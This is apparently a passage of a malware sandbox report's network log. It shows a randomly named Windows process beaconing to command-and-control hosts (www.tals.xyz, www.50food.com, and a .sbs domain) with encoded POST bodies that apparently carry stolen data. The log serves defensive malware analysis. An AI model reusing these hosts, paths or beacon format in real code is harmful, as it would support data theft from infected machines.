                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      29192.168.2.45002613.248.169.48804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:11:56.549448967 CET710OUTPOST /cpgr/ HTTP/1.1
                                                                                      Host: www.tals.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.tals.xyz
                                                                                      Referer: http://www.tals.xyz/cpgr/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 205
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 2f 57 6e 35 7a 4e 57 6c 30 6e 53 61 6f 56 72 77 57 45 30 4a 73 45 72 69 38 42 4e 50 76 37 67 48 4e 70 2f 77 6b 65 4c 72 44 56 47 30 4e 4a 74 36 2f 5a 45 4c 49 69 73 57 7a 67 35 76 52 4e 47 57 4f 74 75 4d 6b 64 79 31 51 63 71 39 6f 4c 6f 38 75 46 4b 5a 51 51 6a 31 76 6e 4d 6d 79 57 47 45 52 56 31 6b 52 47 50 39 50 57 2b 49 50 69 56 37 4d 4b 76 53 52 39 43 35 38 45 75 48 4f 69 71 75 64 31 50 4a 74 70 51 49 65 57 2f 63 74 6d 62 71 78 41 71 6d 49 61 4d 58 4b 32 44 75 34 67 31 52 57 68 4a 6d 58 50 43 66 36 73 34 6b 63 78 38 48 34 42 54 66 56 54 70 4f 6f 52 75 57 55 5a 78 66 50 41 3d 3d
                                                                                      Data Ascii: 3vNdCBvX=/Wn5zNWl0nSaoVrwWE0JsEri8BNPv7gHNp/wkeLrDVG0NJt6/ZELIisWzg5vRNGWOtuMkdy1Qcq9oLo8uFKZQQj1vnMmyWGERV1kRGP9PW+IPiV7MKvSR9C58EuHOiqud1PJtpQIeW/ctmbqxAqmIaMXK2Du4g1RWhJmXPCf6s4kcx8H4BTfVTpOoRuWUZxfPA==


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      30192.168.2.45003213.248.169.48804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:11:59.213794947 CET730OUTPOST /cpgr/ HTTP/1.1
                                                                                      Host: www.tals.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.tals.xyz
                                                                                      Referer: http://www.tals.xyz/cpgr/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 225
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 2f 57 6e 35 7a 4e 57 6c 30 6e 53 61 6e 55 62 77 52 58 4d 4a 71 6b 72 6a 35 42 4e 50 6b 62 67 44 4e 70 7a 77 6b 62 76 37 44 6d 69 30 4e 73 4a 36 77 39 6f 4c 4a 69 73 57 34 41 35 32 66 74 47 4e 4f 74 69 71 6b 5a 36 31 51 59 43 39 6f 4b 59 38 74 79 65 61 43 51 6a 7a 69 48 4d 6b 74 6d 47 45 52 56 31 6b 52 47 72 62 50 57 57 49 50 53 6c 37 4d 72 76 64 66 64 43 36 31 6b 75 48 4b 69 71 71 64 31 50 4f 74 6f 38 75 65 55 48 63 74 6b 44 71 78 52 71 6e 47 61 4d 64 46 57 43 44 35 44 4d 42 51 6a 63 41 4a 4d 79 4c 33 59 49 54 51 58 78 64 70 77 79 49 48 54 4e 39 31 57 6e 69 5a 61 4d 57 55 44 47 66 2f 77 78 72 4d 6d 53 5a 68 54 56 32 37 38 63 39 35 73 41 3d
                                                                                      Data Ascii: 3vNdCBvX=/Wn5zNWl0nSanUbwRXMJqkrj5BNPkbgDNpzwkbv7Dmi0NsJ6w9oLJisW4A52ftGNOtiqkZ61QYC9oKY8tyeaCQjziHMktmGERV1kRGrbPWWIPSl7MrvdfdC61kuHKiqqd1POto8ueUHctkDqxRqnGaMdFWCD5DMBQjcAJMyL3YITQXxdpwyIHTN91WniZaMWUDGf/wxrMmSZhTV278c95sA=


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      31192.168.2.45003313.248.169.48804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:12:01.885327101 CET10812OUTPOST /cpgr/ HTTP/1.1
                                                                                      Host: www.tals.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.tals.xyz
                                                                                      Referer: http://www.tals.xyz/cpgr/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 10305
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 2f 57 6e 35 7a 4e 57 6c 30 6e 53 61 6e 55 62 77 52 58 4d 4a 71 6b 72 6a 35 42 4e 50 6b 62 67 44 4e 70 7a 77 6b 62 76 37 44 6d 71 30 4e 36 56 36 78 63 6f 4c 4b 69 73 57 37 41 35 7a 66 74 47 41 4f 73 4b 32 6b 5a 32 6c 51 61 4b 39 36 35 51 38 36 33 69 61 49 51 6a 7a 2b 33 4d 6c 79 57 48 4f 52 57 64 6f 52 47 62 62 50 57 57 49 50 55 4a 37 63 71 76 64 53 39 43 35 38 45 75 62 4f 69 71 43 64 31 58 42 74 6f 49 59 65 6c 6e 63 74 45 54 71 77 6a 53 6e 5a 71 4d 62 47 57 43 62 35 43 78 62 51 6a 41 62 4a 4d 32 68 33 66 34 54 42 51 30 46 79 52 47 48 52 77 68 47 31 56 44 34 59 49 4d 57 4d 51 79 7a 37 68 74 41 50 57 57 56 6b 45 45 74 71 76 51 51 6f 35 57 34 30 41 57 4f 6b 39 44 7a 63 50 43 36 4f 6a 4e 69 48 47 52 6a 4b 76 55 2f 72 74 2b 4e 64 41 6a 52 52 2b 7a 4f 59 78 74 4d 47 6e 78 63 61 54 71 53 44 31 69 59 59 2b 71 42 36 71 77 5a 2b 37 49 4f 65 42 37 7a 2f 72 66 46 34 4f 48 70 76 74 61 76 6a 62 2b 77 68 31 4b 73 4f 61 5a 4f 74 31 36 43 54 6c 30 50 61 54 42 65 79 4d 6d 7a 36 36 5a 4e 6b [TRUNCATED]
                                                                                      Data Ascii: 3vNdCBvX=/Wn5zNWl0nSanUbwRXMJqkrj5BNPkbgDNpzwkbv7Dmq0N6V6xcoLKisW7A5zftGAOsK2kZ2lQaK965Q863iaIQjz+3MlyWHORWdoRGbbPWWIPUJ7cqvdS9C58EubOiqCd1XBtoIYelnctETqwjSnZqMbGWCb5CxbQjAbJM2h3f4TBQ0FyRGHRwhG1VD4YIMWMQyz7htAPWWVkEEtqvQQo5W40AWOk9DzcPC6OjNiHGRjKvU/rt+NdAjRR+zOYxtMGnxcaTqSD1iYY+qB6qwZ+7IOeB7z/rfF4OHpvtavjb+wh1KsOaZOt16CTl0PaTBeyMmz66ZNkW28YPurLQ98OMOaPq8cYmgJQ6qdetXz0rTPIRxCF7+h/+bSYuz3NENHY9EBx+TMDhQAoyVS/NzoEyiRAZ+t0mU5PXp+sHbZU4vHXJ/urM6hrUgMvwTgJRXfinsgcTLcUi2lCLLJDIWUXZZx98k0J2x+xfTt0MtPmNE1EpDJoP9J5wpTpEYnELE3ObvN8PzXcNZ8GvSb2RI18qYfp1/rU/WcMTC4wumXKAEsfV07ZRHpJOycNRCxIslNPJZiAU+wpZC5Wsnbp1PKDnTH5KJOYEXYJPMXH0Znz5VXZtJC/DLybYxNKrdfc5ZwW8kfguDfka4Z1i1UsOJ19dJ5tf59+pAUAF2X5hSYH/HZuw/0BsWgEU9f+lzwHWylK0DaNFEWnE4RAgj7YJTIFABktioGiBd/dk0Y0WWRf/drvtG/OjdEwUo11Fon2UGYLIakbcrzUqPbeeltz6kv7ad9T6aJJqeOl6Ka1LRihblNuCAdSRwBbeo4JnQ3QDMakklhJXWQfqATd2djIrCH9GNoXh1k5caKxwtWeCZ4prNi4Ems0C5Nn/dh/N3Gn2FaTQu8XrY6Fi9adMonZkMbUGYufVWG14gj4tIC/+5hCeU4/7LlDCELQADEibtZJVSeQP+o8SDFPgKa5Jd6JxhpkZrQO/acdxzROIyaw1BPTCg [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      32192.168.2.45003413.248.169.48804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:12:04.553461075 CET456OUTGET /cpgr/?3vNdCBvX=yUPZw4O96lKRgUDhHw42lX6F/Rxn05lUVr3HqoHreXe2a6Vc78U2VxoX4VUOXe2AKNSXv9msRJ2q39Y75lzjFijspiVTtXDCDHBic1mdKVGnCgRAN7vlfYA=&etx=BXy4elO0X HTTP/1.1
                                                                                      Host: www.tals.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Nov 24, 2024 08:12:05.645957947 CET398INHTTP/1.1 200 OK
                                                                                      Server: openresty
                                                                                      Date: Sun, 24 Nov 2024 07:12:05 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 258
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 33 76 4e 64 43 42 76 58 3d 79 55 50 5a 77 34 4f 39 36 6c 4b 52 67 55 44 68 48 77 34 32 6c 58 36 46 2f 52 78 6e 30 35 6c 55 56 72 33 48 71 6f 48 72 65 58 65 32 61 36 56 63 37 38 55 32 56 78 6f 58 34 56 55 4f 58 65 32 41 4b 4e 53 58 76 39 6d 73 52 4a 32 71 33 39 59 37 35 6c 7a 6a 46 69 6a 73 70 69 56 54 74 58 44 43 44 48 42 69 63 31 6d 64 4b 56 47 6e 43 67 52 41 4e 37 76 6c 66 59 41 3d 26 65 74 78 3d 42 58 79 34 65 6c 4f 30 58 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?3vNdCBvX=yUPZw4O96lKRgUDhHw42lX6F/Rxn05lUVr3HqoHreXe2a6Vc78U2VxoX4VUOXe2AKNSXv9msRJ2q39Y75lzjFijspiVTtXDCDHBic1mdKVGnCgRAN7vlfYA=&etx=BXy4elO0X"}</script></head></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      33192.168.2.450035147.255.21.187804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:12:11.487574100 CET716OUTPOST /u9hy/ HTTP/1.1
                                                                                      Host: www.50food.com
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.50food.com
                                                                                      Referer: http://www.50food.com/u9hy/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 205
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 62 6f 34 4c 72 4a 51 70 35 57 6a 52 50 6d 79 50 61 77 69 38 50 4c 75 4b 42 59 31 47 6d 6b 59 39 78 70 2b 30 63 68 64 64 35 68 57 54 56 67 4d 63 55 2f 51 59 45 4a 57 32 70 49 58 34 53 4d 44 2b 4c 45 46 6e 38 79 43 47 67 6a 53 48 52 5a 79 68 34 70 51 5a 43 4c 5a 6c 45 42 72 74 73 41 55 67 48 32 45 72 75 4e 5a 78 6f 61 52 6c 4c 50 77 79 48 54 6a 67 77 32 2f 56 79 62 62 6a 4a 48 42 65 77 43 6f 55 64 55 33 32 47 2f 6b 51 54 51 37 57 53 67 66 36 67 59 4f 64 33 6f 32 67 53 7a 34 67 74 34 32 6c 4a 65 4c 64 37 4c 32 61 64 35 66 6a 6f 49 57 70 6b 6c 51 4a 4f 4d 4c 71 44 31 6d 65 78 77 3d 3d
                                                                                      Data Ascii: 3vNdCBvX=bo4LrJQp5WjRPmyPawi8PLuKBY1GmkY9xp+0chdd5hWTVgMcU/QYEJW2pIX4SMD+LEFn8yCGgjSHRZyh4pQZCLZlEBrtsAUgH2EruNZxoaRlLPwyHTjgw2/VybbjJHBewCoUdU32G/kQTQ7WSgf6gYOd3o2gSz4gt42lJeLd7L2ad5fjoIWpklQJOMLqD1mexw==
                                                                                      Nov 24, 2024 08:12:12.740991116 CET309INHTTP/1.1 403 Forbidden
                                                                                      Server: nginx
                                                                                      Date: Sun, 24 Nov 2024 07:12:07 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 166
                                                                                      Connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      34192.168.2.450036147.255.21.187804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:12:14.193451881 CET736OUTPOST /u9hy/ HTTP/1.1
                                                                                      Host: www.50food.com
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.50food.com
                                                                                      Referer: http://www.50food.com/u9hy/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 225
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 62 6f 34 4c 72 4a 51 70 35 57 6a 52 41 6d 43 50 63 58 2b 38 4a 72 75 4a 45 59 31 47 74 45 5a 56 78 70 79 30 63 67 59 57 35 54 69 54 56 42 38 63 47 72 38 59 42 4a 57 32 6e 6f 57 77 63 73 44 35 4c 45 5a 56 38 7a 2b 47 67 6a 47 48 52 61 6d 68 34 34 51 65 43 62 5a 6e 4d 68 72 72 69 67 55 67 48 32 45 72 75 4e 4d 61 6f 62 31 6c 4b 38 59 79 47 78 4c 6a 73 6d 2f 53 7a 62 62 6a 65 33 42 61 77 43 6f 36 64 56 37 63 47 35 67 51 54 56 2f 57 54 78 66 35 75 59 4f 48 35 49 33 48 55 6d 4e 61 33 62 44 62 44 38 4f 6d 38 71 53 63 59 2f 53 35 35 35 33 2b 32 6c 30 36 54 4c 43 65 4f 32 62 58 71 37 36 42 59 36 52 49 50 54 73 71 77 41 77 69 59 6f 46 34 6b 41 38 3d
                                                                                      Data Ascii: 3vNdCBvX=bo4LrJQp5WjRAmCPcX+8JruJEY1GtEZVxpy0cgYW5TiTVB8cGr8YBJW2noWwcsD5LEZV8z+GgjGHRamh44QeCbZnMhrrigUgH2EruNMaob1lK8YyGxLjsm/Szbbje3BawCo6dV7cG5gQTV/WTxf5uYOH5I3HUmNa3bDbD8Om8qScY/S5553+2l06TLCeO2bXq76BY6RIPTsqwAwiYoF4kA8=
                                                                                      Nov 24, 2024 08:12:15.407304049 CET309INHTTP/1.1 403 Forbidden
                                                                                      Server: nginx
                                                                                      Date: Sun, 24 Nov 2024 07:12:10 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 166
                                                                                      Connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      35192.168.2.450037147.255.21.187804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:12:16.903873920 CET10818OUTPOST /u9hy/ HTTP/1.1
                                                                                      Host: www.50food.com
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.50food.com
                                                                                      Referer: http://www.50food.com/u9hy/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 10305
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 62 6f 34 4c 72 4a 51 70 35 57 6a 52 41 6d 43 50 63 58 2b 38 4a 72 75 4a 45 59 31 47 74 45 5a 56 78 70 79 30 63 67 59 57 35 54 36 54 56 33 49 63 55 61 38 59 47 4a 57 32 35 34 57 7a 63 73 44 6f 4c 45 42 72 38 7a 79 57 67 68 2b 48 51 34 2b 68 70 62 49 65 4d 62 5a 6e 4f 68 72 75 73 41 56 6f 48 79 67 76 75 4e 63 61 6f 62 31 6c 4b 36 6b 79 57 54 6a 6a 75 6d 2f 56 79 62 62 76 4a 48 42 69 77 43 67 4d 64 56 76 6d 48 4a 41 51 53 31 50 57 55 43 33 35 69 59 4f 5a 2b 49 33 66 55 6d 4a 2f 33 62 65 71 44 39 72 75 38 70 4f 63 59 37 58 44 75 61 2b 6c 74 45 49 72 50 73 2b 65 48 6d 33 70 73 70 65 62 51 59 5a 4a 4e 67 70 49 74 54 74 48 4d 6f 41 6e 38 6d 61 5a 4d 69 35 66 6f 35 6b 4b 4b 77 36 4e 71 43 31 4d 58 39 55 34 6c 4d 79 4e 34 6f 66 48 6f 42 30 64 70 34 4a 54 46 33 39 4b 4f 52 4d 57 73 55 58 48 39 4b 45 58 4a 45 35 6c 63 6b 66 48 31 50 63 78 36 4a 37 4c 56 6f 30 71 44 38 67 4d 58 52 33 34 6e 48 4f 43 2b 56 36 68 39 4a 71 74 4d 4e 34 54 4f 61 77 31 32 67 66 4c 4e 63 56 45 4c 4e 76 4b 79 [TRUNCATED]
                                                                                      Data Ascii: 3vNdCBvX=bo4LrJQp5WjRAmCPcX+8JruJEY1GtEZVxpy0cgYW5T6TV3IcUa8YGJW254WzcsDoLEBr8zyWgh+HQ4+hpbIeMbZnOhrusAVoHygvuNcaob1lK6kyWTjjum/VybbvJHBiwCgMdVvmHJAQS1PWUC35iYOZ+I3fUmJ/3beqD9ru8pOcY7XDua+ltEIrPs+eHm3pspebQYZJNgpItTtHMoAn8maZMi5fo5kKKw6NqC1MX9U4lMyN4ofHoB0dp4JTF39KORMWsUXH9KEXJE5lckfH1Pcx6J7LVo0qD8gMXR34nHOC+V6h9JqtMN4TOaw12gfLNcVELNvKy1kVi2NMjEh8P3j4K8H4IxbzB0o5obHCDQBA3ts/4B/M6Ve1zLg0mCHA7Aj9FGJqiP53EFu3ag7BCHDddRmuM3cbhOOH2DM8wVs6W3igBPuEyR6FetVcEdSFRehhwxOFxXHHs/9TB9oHAr7zdXar0aHtUTqpRo93rLZ9eM4nE99uVxFAJzJ0WTmIz7QwvPLOFXH6cqfrQi5YkV3F1+EpD9ss7wU2H2ez9xTcIs+JwDCtrm+7qr6x4qwRhqVj+nJtOkVRI+0D+mxIk3E68W+HUM1i+3pSPiZYroABsh2IzaQxHhNCgWvjPX1Sir3dOH6YMffR0FpQAKN7UzH+nalhSwYUEoRaW/YUST3TnvRbn78K54w7JKoQUN9GnLmW2OIeS3MAxV3JbC9c4kHoV944scqWyirmBCul63MmYYGC3LBAYH5K0+b6DmkWabgtg8I6/0gq8rkN3Dd/rdYX02H512sEU0uVWnIp2MTTCR6MNbtP4v37GM+8WNFVUV8mVrqdUU58+OURkRTCbiIZdDZ2vh8hA5sKzwzDxAxIi359KcM/J/B5GiOWqhudEHwwYJHd6Z9w6agYifzZuRVJSkS/CS5bGRv1VkKGYnPKh9AbgTf6kVNxOlFhXaVW7JspF/ZnhgUimgWyIGNZgHbRTQlgVj5b9LGdv/5lxjn [TRUNCATED]
                                                                                      Nov 24, 2024 08:12:18.190557957 CET309INHTTP/1.1 403 Forbidden
                                                                                      Server: nginx
                                                                                      Date: Sun, 24 Nov 2024 07:12:13 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 166
                                                                                      Connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      36192.168.2.450038147.255.21.187804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:12:19.576195002 CET458OUTGET /u9hy/?3vNdCBvX=WqQro+xdjTeJIlGwaHeXAa2bD6tPyTI49rKxVxpmjgGfbhgcY6AAEIO8u8GwbvTJPVNB3UOdkxCDRvWF6atxIpJrNQCfkQktXm0b+9FyofxiDukpHyXFoA4=&etx=BXy4elO0X HTTP/1.1
                                                                                      Host: www.50food.com
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Nov 24, 2024 08:12:20.825225115 CET141INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Sun, 24 Nov 2024 07:12:15 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 0
                                                                                      Connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      37192.168.2.450039104.21.42.77804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:12:26.345483065 CET740OUTPOST /f8c6/ HTTP/1.1
                                                                                      Host: www.zriaraem-skiry.sbs
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
